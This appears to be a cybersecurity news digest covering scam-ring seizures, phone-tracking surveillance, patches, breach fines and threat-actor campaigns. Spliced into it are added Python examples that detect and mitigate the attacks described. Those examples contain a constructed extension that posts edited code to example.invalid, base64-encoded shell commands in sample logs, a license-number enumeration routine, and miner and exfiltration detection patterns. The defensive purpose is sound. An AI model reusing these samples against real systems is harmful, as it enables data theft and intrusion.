US seizes $15 billion, sanctions Huione group, and indicts Cambodian scam ringleader
S. Korea seeks return of disappeared workers from Cambodia, First Wap has built a phone-tracking empire, Microsoft plugs 172 security holes, Windows 10 reaches end-of-support, ICO fines Capita $19m for 2023 data breach protection fails, PowerSchool hacker sentenced to 4 years, much more


Metacurity is a reader-supported publication that requires significant work and non-trivial expenses. We rely on the generous support of our paid readers. Please consider upgrading your subscription to support Metacurity's ongoing work. Thank you.
If you're unable to commit to a subscription today, please consider donating whatever you can. Thank you!
The US Justice Department seized about $15 billion worth of bitcoin held in cryptocurrency wallets owned by a man who oversaw a massive “pig butchering” fraud operation based in Cambodia, prosecutors said.
The seizure is the largest forfeiture action sought by the DOJ in history. The multi-agency action involves sanctions from the Office of Foreign Assets Control (OFAC) against 146 targets within the Prince Group TCO, led by Cambodian national Chen Zhi.
Concurrently, the Financial Crimes Enforcement Network (FinCEN) has issued a final rule under Section 311 of the USA PATRIOT Act to sever the Huione Group, a financial services conglomerate, from the US financial system, designating it a "primary money laundering concern."
An indictment charging the alleged pig butcher, Chen Zhi, with wire fraud conspiracy and money laundering conspiracy was unsealed in federal court in Brooklyn, New York.
Zhi, a 38-year-old Chinese-born emigre who is also known as “Vincent,” remains at large, according to the US Attorney’s Office for the Eastern District of New York. Zhi faces up to 40 years in prison if convicted of the charges.
He was identified in court filings as the founder and chairman of Prince Holding Group, a multinational business conglomerate based in Cambodia, which prosecutors said grew “in secret … into one of Asia’s largest transnational criminal organizations.” The Prince Group allegedly operates 10 scam compounds in Cambodia.
The Treasury Department, in parallel action on Tuesday, designated Prince Group as a transnational criminal organization and announced sanctions against Chen Zhi and more than 100 associated individuals and entities for their roles in the alleged illicit activity.
The Prince Group, which operates businesses in more than 30 countries, ran “forced-labor scam compounds across Cambodia,” the US Attorney’s Office said. (Dan Mangan / CNBC and Elliptic)
Related: US Treasury, US Department of Justice, DL News, Decrypt, The Block, Bloomberg, Blockworks, The Guardian, Wall Street Journal, Bitcoin Magazine, CryptoSlate, Crypto Briefing, Watcher Guru, r/Bitcoin, Wired, BBC News, The Record, Payment Security

South Korean officials said that they were trying to bring back missing South Koreans from Cambodia, where hundreds of people have disappeared into online scam centers that steal billions of dollars from victims worldwide.
Outrage in South Korea has grown after 330 people were reported missing after traveling to Cambodia this year, including a 22-year-old university student who was later found dead. Others have been tortured and confined by those running the scams, South Korean officials said.
The victims were lured by high-paying job offers, only to be forced to defraud other South Koreans, officials said.
Most of those reported to have disappeared have since been accounted for, but 79 were still missing in Cambodia, Wi Sung-lac, South Korea’s national security director, said at a news conference. He added that the government would also try to repatriate about 60 people who the Cambodian authorities had detained.
South Korea’s Foreign Ministry said that, starting Thursday, it was barring South Koreans from traveling to parts of Cambodia where scams and human confinements were rife. (John Yoon and Francesca Regalado / New York Times)
Related: Korea Times, Reuters, AFP, The Guardian, South China Morning Post, Yonhap News Agency
Investigative journalists at Lighthouse Reports, in conjunction with a coalition of media partners, discovered that a surveillance company called First Wap has built a phone-tracking empire with a global footprint using its proprietary system Altamides, which is "a unified platform to covertly locate the whereabouts of single or multiple suspects in real-time, to detect movement patterns, and to detect whether suspects are in close vicinity with each other.”
Altamides leaves no trace on the phones it targets, unlike spyware such as Pegasus. Nor does it require a target to click on a malicious link or show any of the telltale signs (such as overheating or a short battery life) of remote monitoring.
Its secret is shrewd use of the antiquated telecom language Signaling System No. 7, known as SS7, that phone carriers use to route calls and text messages. Any entity with SS7 access can send queries requesting information about which cell tower a phone subscriber is nearest to, an essential first step to sending a text message or making a call to that subscriber. But First Wap’s technology uses SS7 to zero in on phone numbers and trace the location of its users.
Lighthouse Reports obtained a secret archive containing more than a million instances where Altamides was used to trace cell phones all over the world. This data trove, the majority of which spans 2007 to 2014, is one of the largest disclosures to date of the inner workings of the vast surveillance industry. It does not just list the phone numbers of people who were monitored; it offers, in many cases, precise maps of their movements, showing where they went and when. Over months of research, Lighthouse, Germany’s Paper Trail Media, Mother Jones, Reveal, and an international consortium of partners dug into these logs to understand who was being spied on and why.
The journalists identified surveillance targets in 100 countries and spoke to dozens of them. (Gabriel Geiger, Crofton Black, Emmanuel Freudenthal, and Riccardo Coluccini / Mother Jones)
Related: Lighthouse Reports, Mother Jones on YouTube, Lighthouse Reports, Le Monde, Der Standard, Spiegel, IRPI Media
Microsoft released software updates to plug 172 security holes in its Windows operating systems, including at least two vulnerabilities that are already being actively exploited.
October’s Patch Tuesday also marks the final month that Microsoft will ship security updates for Windows 10 systems.
The first zero-day bug addressed this month (CVE-2025-24990) involves a third-party modem driver called Agere Modem that’s been bundled with Windows for the past two decades. Microsoft responded to active attacks on this flaw by completely removing the vulnerable driver from Windows.
The other zero-day is CVE-2025-59230, an elevation of privilege vulnerability in Windows Remote Access Connection Manager (also known as RasMan), a service used to manage remote network connections through virtual private networks (VPNs) and dial-up networks.
Windows 10 isn’t the only Microsoft product reaching end-of-life today; Exchange Server 2016, Exchange Server 2019, Skype for Business 2016, Windows 11 IoT Enterprise Version 22H2, and Outlook 2016 are some of the other products that Microsoft is sunsetting today. (Brian Krebs / Krebs on Security)
Related: SANS Internet Storm Center, Bleeping Computer, CSO Online, The Register, Qualys, Thurrott, Dark Reading, CyberScoop, AskWoody, The Stack
Yesterday was the official end-of-support date for Microsoft's Windows 10, meaning that Windows 10 users received their last regular security patches and that Microsoft is washing its hands of technical support.
This end-of-support date comes about a decade after the initial release of Windows 10, which is typical for most Windows versions. But it comes just four years after Windows 10 was replaced by Windows 11, a version with stricter system requirements that left many older-but-still-functional PCs with no officially supported upgrade path.
As a result, Windows 10 still runs on roughly 40 percent of the world's Windows PCs (or around a third of US-based PCs), according to StatCounter data.
But this end-of-support date also isn't set in stone. Home users with Windows 10 PCs can enroll in Microsoft's Extended Security Updates (ESU) program, which extends the support timeline by another year. (Andrew Cunningham / Ars Technica)
Related: Bleeping Computer, Windows Central, Bloomberg, Microsoft Support, Windows, ZDNET, Neowin, Windows Latest, The Document Foundation Blog, Computerworld, Windows Report, Microsoft Support, r/technology, r/technews, Slashdot, Tom's Guide
Outsourcing giant Capita was fined £14m (around $19 million) by the Information Commissioner’s Office (ICO) for failing to protect personal data after hackers stole 6.6 million people’s information during a cyber attack in 2023.
The data watchdog confirmed the March 2023 breach exposed a wide array of personal information, including pension details, staff records, and customer data from organizations supported by Capita.
Crucially, this also encompassed highly sensitive categories such as criminal records, financial details, and 'special category data' covering race, religion, and sexual orientation.
The ICO apportioned the fine, with £8m (around $11 million) levied against Capita and £6m (around $8 million) against Capita Pension Solutions. The latter, which processes data for over 600 pension schemes, saw 325 associated organizations also affected by the breach.
John Edwards, UK information commissioner, said: “Capita failed in its duty to protect the data entrusted to it by millions of people.” (Holly Williams / Independent)
Related: ICO, The Guardian, Consumer Voice, Financial Times, Irish News, Infosecurity Magazine
Computer hacker and former college student Matthew Lane, who was a teenager when he carried out a massive cyberattack on education technology company PowerSchool, was sentenced in federal court to four years in prison and ordered to pay more than $14 million in restitution.
Lane, a former Assumption University freshman who federal prosecutors described as a sophisticated and experienced cybercriminal, told a federal judge that his crimes occurred during an “extremely dark time in my life,” but acknowledged, “I deserve to be punished.”
In June, Lane pleaded guilty to what is widely considered the largest exposure of private student data in history, a breach that compromised the sensitive information of some 60 million students and 10 million educators.
Lane said he takes “full responsibility” for his crimes but that he was “disconnected from reality” while he engaged in hacking. He has since become “sober not just from drugs, but from the internet as well,” he told the judge.
Accompanied in court by family members and several friends, Lane broke down and sobbed after learning his sentence, which includes three years of supervised release and a $25,000 fine. (Mark Keierleber / The74)
Related: Worcester Telegram and Gazette, Reuters
According to the Department of Homeland Security, criminal organizations operating out of China, which investigators blame for all those toll and postage text messages, have used them to make more than $1 billion over the last three years.
Behind the con, investigators say, is a black market connecting foreign criminal networks to server farms that blast scam texts to victims. The scammers use phishing websites to collect credit-card information. They then find gig workers in the US who will max out the stolen cards for a small fee.
Making the fraud possible: an ingenious trick allowing criminals to install stolen card numbers in Google and Apple Wallets in Asia, then share the cards with people in the US, making purchases half a world away.
Criminal gangs can flood people with text messages using SIM farms, rooms jammed with boxes of networking devices. The servers are stuffed with the little white cards that mobile customers put in their new phones to begin making calls or sending texts.
“One person in a room with a SIM farm can send out the number of text messages that 1,000 phone numbers could send out,” said Adam Parks, an assistant special agent in charge at Homeland Security Investigations, the investigative arm of DHS.
Criminal gangs overseas typically operate the farms remotely, but hire gig workers in the US to set them up. The gangs recruit the workers via the WeChat messaging app, Parks said. Workers needing help have instruction manuals and live technical support. (Robert McMillan / Wall Street Journal)
Related: The Independent
The Brevard County, FL, sheriff's office said that a real estate scam nearly left one Brevard County resident out of over $1.7 million.
The incident was reported back in July after hackers infiltrated an email chain between “parties involved in a large property purchase.”
The hackers impersonated the sellers and changed the wire transfer instructions, causing the buyer to transfer the full amount into the suspects’ account unknowingly, deputies added.
Afterward, the criminals moved $750,000 into another account within the same financial institution.
“The victim discovered the fraud within hours and immediately contacted his bank, and they told him it was unlikely to get the money back,” the sheriff's office said. “Thankfully, the victim also alerted the Brevard County Sheriff’s Office, and our Economic Crimes Task Force quickly went to work!”
As a result, the sheriff’s office was able to recover all funds by 10 p.m. the same evening, investigators reported. (Anthony Talcott / Click Orlando)
Related: Brevard County on Facebook, Space Coast Daily
New York State has fined eight major auto insurance companies over $19 million after an investigation uncovered major cybersecurity failures that exposed the personal data of residents, including driver’s license numbers and birthdates.
The car insurance companies involved in the settlement are American Family Mutual Insurance Company/Midvale Indemnity Company, Farmers Insurance, Hagerty Insurance Agency, The Hartford Insurance Group, Infinity Insurance Company, Liberty Mutual Insurance, Metromile, and State Auto Mutual Insurance Company.
These fines come as part of a joint investigation between the New York State Department of Financial Services (DFS) and the New York State Attorney General’s Office (OAG).
These companies allowed people to obtain a car insurance price quote using an online tool. Some of the companies also provided password-protected tools to insurance agents to generate quotes for customers.
The OAG’s investigation found that data thieves were able to exploit a “pre-fill” function in the companies’ online quoting tools. After limited private information about an individual was entered through an online quoting tool, the company would “pre-fill” the form with private information purchased from data brokers.
The purpose of “pre-fill” was to insert information the user might not have on hand and make filling out the form easier. For example, by entering limited information into the tool, such as a person’s full name and date of birth, the other fields on the tool were pre-populated, such as an individual’s driver’s license numbers and similar information about other drivers in their household.
The OAG found that the car insurance companies did not take reasonable steps to protect pre-filled private information. The attacks on these eight companies exposed the private information of over 825,000 New Yorkers. Some of the exposed data was later used to file unemployment claims during the COVID-19 pandemic. (Fingerlakes1 and New York Attorney General)
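The weakness the OAG describes is a "pre-fill" that turns two easily obtained facts (name and date of birth) into a full driver's license number. The following is an added illustration, not code from any of the insurers or from the OAG: the vulnerable lookup alongside a hardened design that only masks and confirms the number, hides household members, throttles lookups per source address, and records every query. The broker records are constructed, and the hardened design is my assumption of reasonable controls, not a restatement of the settlement terms.

```python
"""Vulnerable vs hardened quote 'pre-fill' (added illustration; constructed data)."""
import hmac
from collections import defaultdict

# Constructed stand-in for records an insurer buys from a data broker. Not real people.
BROKER_RECORDS = {
    ("jane doe", "1980-04-02"): {
        "dl_number": "D12345678",
        "household": [{"name": "John Doe", "dl_number": "D87654321"}],
    },
}


def prefill_vulnerable(full_name: str, dob: str) -> dict:
    """Pattern the OAG described: name plus DOB unlock the full license number and
    the household's details, with no further check and no throttling."""
    rec = BROKER_RECORDS.get((full_name.strip().lower(), dob))
    return dict(rec) if rec else {}


def mask_dl(dl: str) -> str:
    """Show only the last three characters, enough for the user to recognise it."""
    return "*" * max(len(dl) - 3, 0) + dl[-3:]


class HardenedQuoteTool:
    """Assumed hardened design (mine, not from any settlement):
    - never returns the full license number; the user types it and it is only confirmed
    - does not expose other household members at all
    - throttles lookups per source so enumerating name/DOB pairs is slow and noisy
    - records every lookup so abuse can be found after the fact
    """

    def __init__(self, max_lookups_per_source: int = 5):
        self.max_lookups = max_lookups_per_source
        self.lookups = defaultdict(int)
        self.audit_log: list[tuple[str, str, str]] = []

    def prefill(self, full_name: str, dob: str, source_ip: str) -> dict:
        self.lookups[source_ip] += 1
        self.audit_log.append((source_ip, full_name, "prefill"))
        if self.lookups[source_ip] > self.max_lookups:
            raise PermissionError("too many quote lookups from this source")
        rec = BROKER_RECORDS.get((full_name.strip().lower(), dob))
        if rec is None:
            return {"dl_on_file": False}
        # A hint that a record exists plus a masked value; nothing usable for fraud.
        return {"dl_on_file": True, "dl_number_masked": mask_dl(rec["dl_number"])}

    def confirm_dl(self, full_name: str, dob: str, dl_number: str, source_ip: str) -> bool:
        """The user supplies the number; the server only says whether it matches.
        Constant-time comparison avoids leaking the stored value via timing."""
        self.audit_log.append((source_ip, full_name, "confirm"))
        rec = BROKER_RECORDS.get((full_name.strip().lower(), dob))
        if rec is None:
            return False
        return hmac.compare_digest(rec["dl_number"].encode(), dl_number.encode())


def harvest(tool_fn, targets: list[tuple[str, str]]) -> list[str]:
    """Simulates the enumeration the thieves ran: feed name/DOB pairs, keep whatever
    full license numbers come back, stop when the tool throttles."""
    out = []
    for name, dob in targets:
        try:
            result = tool_fn(name, dob)
        except PermissionError:
            break
        if "dl_number" in result:
            out.append(result["dl_number"])
    return out


if __name__ == "__main__":
    print("vulnerable:", harvest(prefill_vulnerable, [("Jane Doe", "1980-04-02")]))
    tool = HardenedQuoteTool(max_lookups_per_source=3)
    print("hardened:", harvest(lambda n, d: tool.prefill(n, d, "203.0.113.9"),
                               [("Jane Doe", "1980-04-02")] * 5))
    print("confirm:", tool.confirm_dl("Jane Doe", "1980-04-02", "D12345678", "203.0.113.9"))
```

Run against the same enumeration, the vulnerable function hands back the license number on the first try, while the hardened tool never discloses it, returns only a masked hint, and cuts the caller off after the configured number of lookups.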
Related: Hoodline
A politically charged message was broadcast over the public address system at Harrisburg International Airport, prompting police to investigate.
An unauthorized user gained access to the system and played a recorded message that included a list of alleged hackers followed by the statement, “[Expletive] Netanyahu and Trump.”
The message did not contain any threats to the airport nor its tenants, airlines, or passengers, the airport said in a statement.
“During this incident, a Delta flight was boarding,” the statement said. “Out of an abundance of caution, the aircraft was searched. No security issues were found, and the flight departed safely.”
Flights are operating normally at the airport, which is the third largest in Pennsylvania. (Alton Northup, McKenzie Jarrell / ABC27)
Related: WGAL, Daily Voice
The US Army is poised to set up a new command or center to oversee the service’s data environment, according to a senior officer.
Lt. Gen. Jeth Rey, deputy chief of staff, G-6, said that he’s slated to brief Army Chief of Staff Gen. Randy George on Oct. 30 to get final approval of the “plan of action.”
The initiative is coming as the service is pursuing Next Generation Command and Control (NGC2) and other data-centric modernization initiatives.
“Data is the new ammunition, so we’re going to focus on it. And because of that, the team and I have said, ‘Hey, we have got to do something for the Army” enterprise, Rey told reporters on the sidelines of the annual AUSA conference. “So we’re going to stand up what is called the Army data operations center or command. … The name hasn’t been labeled yet. But the team is actually in its infancy, standing up for [initial operating capability] to oversee the entire Army’s data environment when it comes to Next Gen C2 and really beyond that. It’s not only focused around Next Gen C2. It has a big role in there, but this command is going actually to look at data across all echelons.” (Jon Harper / DefenseScoop)
Related: Defense News, Business Insider
German and Bulgarian authorities seized 1,406 active internet domains at the beginning of October, which were used for fraudulent financial investment websites.
Since October 3rd, the domains have resolved only to a seizure notice.
To seize the domains, the Cybercrime Center at the Public Prosecutor's Office Karlsruhe, the State Criminal Police Office Baden-Württemberg, and the Federal Financial Supervisory Authority (Bafin), in cooperation with Europol and Bulgarian law enforcement agencies, conducted Operation Heracles. (Daniel AJ Sokolov / Heise)
Related: Bafin.de, DPA, UNN, Daily Finland

Researchers at Koi Security report that a threat actor called TigerJack is persistently targeting developers with malicious extensions published on Microsoft's Visual Studio Code (VS Code) Marketplace and the Open VSX registry to steal cryptocurrency and plant backdoors.
The campaign has distributed at least 11 malicious VS Code extensions since the beginning of the year. Two of the extensions removed from the VS Code Marketplace, C++ Playground and HTTP Format, have since been republished on the platform through new accounts, the researchers say.
When launched, C++ Playground registers a listener (‘onDidChangeTextDocument’) for C++ files to exfiltrate source code to multiple external endpoints. The listener fires about 500 milliseconds after edits to capture keystrokes in near-real time.
According to Koi Security, HTTP Format works as advertised but secretly runs a CoinIMP miner in the background, using hardcoded credentials and configuration to mine crypto using the host’s processing power.
The miner does not appear to implement any restrictions for resource usage, leveraging the entire computing power for its activity. (Bill Toulas / Bleeping Computer)
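The two behaviours described above (a text-document-change listener feeding a network call after a short delay, and a bundled miner) are cheap to look for in locally installed extensions. The following scanner is an added example written for this page, not Koi Security's tooling and not anything from VS Code: it walks extension directories, reads each extension's own JavaScript (skipping node_modules), and reports extensions that combine onDidChangeTextDocument with outbound network calls, or that carry miner strings. The indicator patterns and the miner strings are my assumptions and will miss obfuscated code; the default root is VS Code's usual user extension directory, and the sample extensions are constructed in a temporary directory so the scan runs offline.

```python
"""Triage scan of installed VS Code extensions (added example; heuristics are assumptions)."""
import json
import re
import tempfile
from pathlib import Path

# Assumed indicator patterns, derived from the behaviours described, not from published IoCs.
LISTENER_RE = re.compile(r"onDidChangeTextDocument")
NETWORK_RE = re.compile(r"\b(fetch\s*\(|https?\.request\s*\(|axios\.|XMLHttpRequest)")
URL_RE = re.compile(r"https?://[A-Za-z0-9._~:/?#@!$&*+,;=%-]+")
MINER_RE = re.compile(r"coinimp|cryptonight|stratum\+tcp://", re.IGNORECASE)
# Numeric final argument of a call, e.g. the ~500 ms setTimeout delay; rough heuristic.
DELAY_RE = re.compile(r",\s*(\d{3,5})\s*\)")


def _js_files(ext_dir: Path):
    for p in ext_dir.rglob("*.js"):
        if "node_modules" in p.parts:
            continue  # dependencies are noisy; start with the extension's own code
        yield p


def scan_extension(ext_dir: Path) -> dict:
    """Return the indicators found in one extension directory."""
    pkg = {}
    pkg_path = ext_dir / "package.json"
    if pkg_path.exists():
        try:
            pkg = json.loads(pkg_path.read_text(encoding="utf-8", errors="replace"))
        except json.JSONDecodeError:
            pass
    listener = network = miner = False
    urls, delays = set(), set()
    for js in _js_files(ext_dir):
        src = js.read_text(encoding="utf-8", errors="replace")
        listener |= bool(LISTENER_RE.search(src))
        network |= bool(NETWORK_RE.search(src))
        miner |= bool(MINER_RE.search(src))
        urls.update(URL_RE.findall(src))
        delays.update(int(m) for m in DELAY_RE.findall(src))
    findings = []
    if listener and network:
        findings.append("document-change listener plus outbound network calls")
    if miner:
        findings.append("cryptominer indicator")
    return {
        "name": pkg.get("name", ext_dir.name),
        "publisher": pkg.get("publisher", "?"),
        "urls": sorted(urls),
        "timer_delays_ms": sorted(delays),
        "findings": findings,
    }


def scan_roots(roots=None) -> list[dict]:
    """Scan every extension under the given roots; return only those with findings."""
    roots = roots or [Path.home() / ".vscode" / "extensions"]  # VS Code's user extension dir
    hits = []
    for root in roots:
        root = Path(root)
        if not root.is_dir():
            continue
        for ext_dir in sorted(root.iterdir()):
            if ext_dir.is_dir():
                report = scan_extension(ext_dir)
                if report["findings"]:
                    hits.append(report)
    return hits


def build_sample_root() -> Path:
    """Write two constructed extensions into a temp dir: one mimicking the keystroke
    exfiltration pattern (listener, 500 ms timer, POST of document text) and one benign."""
    root = Path(tempfile.mkdtemp(prefix="vsx-"))
    bad = root / "someone.cpp-playground-1.0.0"
    bad.mkdir()
    (bad / "package.json").write_text(json.dumps({"name": "cpp-playground", "publisher": "someone"}))
    (bad / "extension.js").write_text(
        "const vscode=require('vscode');let t;\n"
        "vscode.workspace.onDidChangeTextDocument(e=>{clearTimeout(t);\n"
        " t=setTimeout(()=>fetch('https://example.invalid/collect',"
        "{method:'POST',body:e.document.getText()}),500);});\n"
    )
    good = root / "someone.linter-2.0.0"
    good.mkdir()
    (good / "package.json").write_text(json.dumps({"name": "linter", "publisher": "someone"}))
    (good / "extension.js").write_text(
        "const vscode=require('vscode');vscode.workspace.onDidChangeTextDocument(e=>{});\n"
    )
    return root


if __name__ == "__main__":
    for hit in scan_roots([build_sample_root()]):
        print(hit["publisher"], hit["name"], hit["findings"], hit["urls"], hit["timer_delays_ms"])
```

Point it at a real extension root by calling scan_roots() with no arguments; the hits are a starting point for manual review, since a legitimate extension can also listen for edits and talk to a server.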
Related: Koi Security, SecurityLab.ru

Researchers at ReliaQuest say that the Chinese state hacking group Flax Typhoon remained undetected in a target environment for more than a year by turning a component in the ArcGIS geo-mapping tool into a web shell.
The ArcGIS geographic information system (GIS) is developed by Esri (Environmental Systems Research Institute) and has support for server object extensions (SOE) that can extend the basic functionality. The software is used by municipalities, utilities, and infrastructure operators to collect, analyze, visualize, and manage spatial and geographic data through maps.
The attacker used their access to upload a malicious Java SOE acting as a web shell that accepted base64-encoded commands through a REST API parameter (layer) and executed them on the internal ArcGIS server, where they appeared as routine operations.
The exchange was protected by a hardcoded secret key, ensuring that only the attackers had access to this backdoor.
ReliaQuest observed suspicious actions targeting two workstations belonging to the target organization's IT staff, as the hacker tried to dump the Security Account Manager (SAM) database, security registry keys, and LSA secrets. (Bill Toulas / Bleeping Computer)
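A backdoor that hides in an SOE's REST endpoint can still be spotted in the web server's access log, because a legitimate "layer" parameter is a small integer or a layer name, not base64 that decodes to shell text. The following is an added example of that check, written for this page and not ReliaQuest's detection logic: it parses access log lines, picks out requests that reach an SOE (ArcGIS Server's /rest/services/<service>/<type>/exts/<SOE>/<operation> path layout), and flags any "layer" value that decodes to printable command text, plus any SOE name outside a site allow-list. The log lines are constructed in Apache combined format, and the allow-list is an assumption to be replaced with the SOEs actually deployed.

```python
"""Flag ArcGIS SOE requests whose 'layer' parameter is a base64-encoded command (added example)."""
import base64
import re
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
SOE_RE = re.compile(r"/rest/services/(?P<service>[^/]+)/(?P<stype>[A-Za-z]+Server)/exts/(?P<soe>[^/?]+)")
# Assumed allow-list of SOE names this site has deployed; anything else deserves a look.
KNOWN_SOES = {"ParcelLookup"}


def decode_command(value: str):
    """Return decoded text if value is valid base64 for printable ASCII, else None.
    Real layer ids (e.g. '0') or names ('Buildings') do not decode this way."""
    if value.isdigit() or len(value) < 8:
        return None
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    if len(raw) < 4 or not all(32 <= b < 127 or b in (9, 10, 13) for b in raw):
        return None
    return raw.decode("ascii")


def analyse(lines: list[str]) -> list[dict]:
    """Return one record per suspicious SOE request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        soe = SOE_RE.search(target)
        if not soe:
            continue  # ordinary map/feature service request, not an extension call
        params = parse_qs(urlsplit(target).query)
        commands = [c for c in map(decode_command, params.get("layer", [])) if c]
        unknown = soe.group("soe") not in KNOWN_SOES
        if commands or unknown:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "service": soe.group("service"),
                "soe": soe.group("soe"),
                "unknown_soe": unknown,
                "commands": commands,
            })
    return hits


# Constructed sample lines: a benign SOE query, a benign layer query, and two backdoor calls.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Oct/2025:09:14:01 +0000] "GET /arcgis/rest/services/Parcels/MapServer/exts/ParcelLookup/query?layer=0&f=json HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Oct/2025:09:14:05 +0000] "GET /arcgis/rest/services/Parcels/MapServer/0/query?where=1%3D1&f=json HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Oct/2025:09:15:22 +0000] "GET /arcgis/rest/services/Parcels/MapServer/exts/ParcelLookup/query?layer=d2hvYW1p&f=json HTTP/1.1" 200 96 "-" "python-requests/2.32"',
    '198.51.100.7 - - [12/Oct/2025:09:15:30 +0000] "POST /arcgis/rest/services/Parcels/MapServer/exts/GeoHelper/run?layer=bmV0IHVzZXIgL2RvbWFpbg%3D%3D&f=json HTTP/1.1" 200 640 "-" "python-requests/2.32"',
]

if __name__ == "__main__":
    for hit in analyse(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["soe"], "unknown" if hit["unknown_soe"] else "known", hit["commands"])
```

On the sample, the two requests from 198.51.100.7 are flagged (the first because "layer" decodes to "whoami", the second because it also names an SOE not on the allow-list), while the routine queries from 10.0.0.5 pass. The same parse works on a real log once the allow-list reflects the site's deployed extensions.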
Related: ReliaQuest, Dark Reading, Security Affairs
Researchers at Eclypsium report that around 200,000 Linux computer systems from American computer maker Framework were shipped with signed UEFI shell components that could be exploited to bypass Secure Boot protections.
An attacker could take advantage to load bootkits (e.g., BlackLotus, HybridPetya, and Bootkitty) that can evade OS-level security controls and persist across OS re-installs.
The problem stems from including a 'memory modify' (mm) command in legitimately signed UEFI shells that Framework shipped with its systems.
The command provides direct read/write access to system memory and is intended for low-level diagnostics and firmware debugging. However, it can also be leveraged to break the Secure Boot trust chain by targeting the gSecurity2 variable, a critical component in the process of verifying the signatures of UEFI modules.
Impacted users should apply the available security updates. Where a patch isn't available yet, secondary measures such as preventing physical access are crucial. Another temporary mitigation is to delete Framework's DB key via the BIOS. (Bill Toulas / Bleeping Computer)
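Whichever mitigation is chosen, the practical check is to look at what is actually enrolled in the Secure Boot "db" variable, both to see whether a vendor key is present and to confirm it is gone after removing it in firmware setup. The following parser is an added example written for this page, not Eclypsium's or Framework's code. It decodes the EFI_SIGNATURE_LIST structures that db contains (layout and the X509/SHA256 type GUIDs from the UEFI specification), reads the variable from Linux efivarfs when run on a real machine, and otherwise falls back to a constructed sample blob; the certificate bytes in that sample are placeholders, not a real certificate. Matching a specific key is done by SHA-256 fingerprint, which you supply from the vendor's published certificate.

```python
"""List Secure Boot db entries and check for a given signer fingerprint (added example)."""
import hashlib
import struct
import uuid
from pathlib import Path

# EFI_IMAGE_SECURITY_DATABASE_GUID, as exposed by Linux efivarfs.
DB_VAR = Path("/sys/firmware/efi/efivars/db-d719b2cb-3d3e-4596-a3bc-dad00e67656f")
EFI_CERT_X509_GUID = uuid.UUID("a5c059a1-94e4-4aa7-87b5-ab155c2bf072")
EFI_CERT_SHA256_GUID = uuid.UUID("c1c41626-504c-4092-aca9-41f936934328")
SIG_TYPES = {EFI_CERT_X509_GUID: "X509", EFI_CERT_SHA256_GUID: "SHA256"}
# EFI_SIGNATURE_LIST header: SignatureType, SignatureListSize, SignatureHeaderSize, SignatureSize
HDR = struct.Struct("<16sIII")


def fingerprint(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def parse_signature_lists(blob: bytes) -> list[dict]:
    """Walk consecutive EFI_SIGNATURE_LISTs; each holds EFI_SIGNATURE_DATA records of
    SignatureOwner GUID (16 bytes) followed by the certificate or hash bytes."""
    entries, off = [], 0
    while off + HDR.size <= len(blob):
        type_raw, list_size, hdr_size, sig_size = HDR.unpack_from(blob, off)
        if list_size < HDR.size or off + list_size > len(blob) or sig_size <= 16:
            raise ValueError(f"malformed EFI_SIGNATURE_LIST at offset {off}")
        sig_type = uuid.UUID(bytes_le=type_raw)
        pos, end = off + HDR.size + hdr_size, off + list_size
        while pos + sig_size <= end:
            owner = uuid.UUID(bytes_le=blob[pos:pos + 16])
            data = blob[pos + 16:pos + sig_size]
            entries.append({
                "type": SIG_TYPES.get(sig_type, str(sig_type)),
                "owner": str(owner),
                "size": len(data),
                "sha256": fingerprint(data),
            })
            pos += sig_size
        off = end
    return entries


def read_db_from_efivars(path: Path = DB_VAR) -> bytes:
    """efivarfs prefixes every variable with a 4-byte attribute word; strip it."""
    return path.read_bytes()[4:]


def has_fingerprint(entries: list[dict], sha256_hex: str) -> bool:
    """True if any enrolled entry (cert or hash) has the given SHA-256 fingerprint."""
    return any(e["sha256"] == sha256_hex for e in entries)


def build_signature_list(sig_type: uuid.UUID, owner: uuid.UUID, datas: list[bytes]) -> bytes:
    """Encoder used only to construct the offline sample; all entries share one size."""
    assert all(len(d) == len(datas[0]) for d in datas)
    body = b"".join(owner.bytes_le + d for d in datas)
    return HDR.pack(sig_type.bytes_le, HDR.size + len(body), 0, 16 + len(datas[0])) + body


# Constructed sample: one "X509" entry made of placeholder bytes (not a real DER
# certificate) and one SHA-256 hash entry, roughly what a db with a vendor cert looks like.
SAMPLE_OWNER = uuid.UUID("12345678-1234-5678-1234-567812345678")
SAMPLE_CERT = b"\x30\x82" + b"\x00" * 30
SAMPLE_HASH = bytes(range(32))
SAMPLE_DB = (
    build_signature_list(EFI_CERT_X509_GUID, SAMPLE_OWNER, [SAMPLE_CERT])
    + build_signature_list(EFI_CERT_SHA256_GUID, SAMPLE_OWNER, [SAMPLE_HASH])
)

if __name__ == "__main__":
    blob = read_db_from_efivars() if DB_VAR.exists() else SAMPLE_DB
    for e in parse_signature_lists(blob):
        print(f'{e["type"]:7} owner={e["owner"]} size={e["size"]:5} sha256={e["sha256"]}')
```

Run as root on a Framework machine, the script prints each enrolled signer; compare the X509 fingerprints against the vendor's certificate before and after removing the key in firmware setup. Removing a DB key is only a stopgap: anything signed by that key, including legitimate vendor firmware tooling, stops booting until the patched firmware is installed.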
Related: Eclypsium
Mozilla is working on a built-in VPN for Firefox, with beta tests opening to select users shortly.
Firefox VPN is still an experimental feature in the early stages of development, but users will be selected at random to test it "over the next few months."
Mozilla describes the feature as one that will sit beside the search bar on Firefox, routing web traffic through a Mozilla-managed VPN server, concealing the user's real IP address while adding a layer of encryption to their communications.
Firefox VPN is a different project entirely from Mozilla VPN, a separate, paid-for product. The Firefox version will be free to use and confined to the browser itself, while Mozilla VPN can be used by up to five devices at a time. (Connor Jones / The Register)
London-based Ploy, a cybersecurity startup, has raised £2.5M (nearly €2.86M or around $3.3 million) in seed funding to address identity-related security breaches.
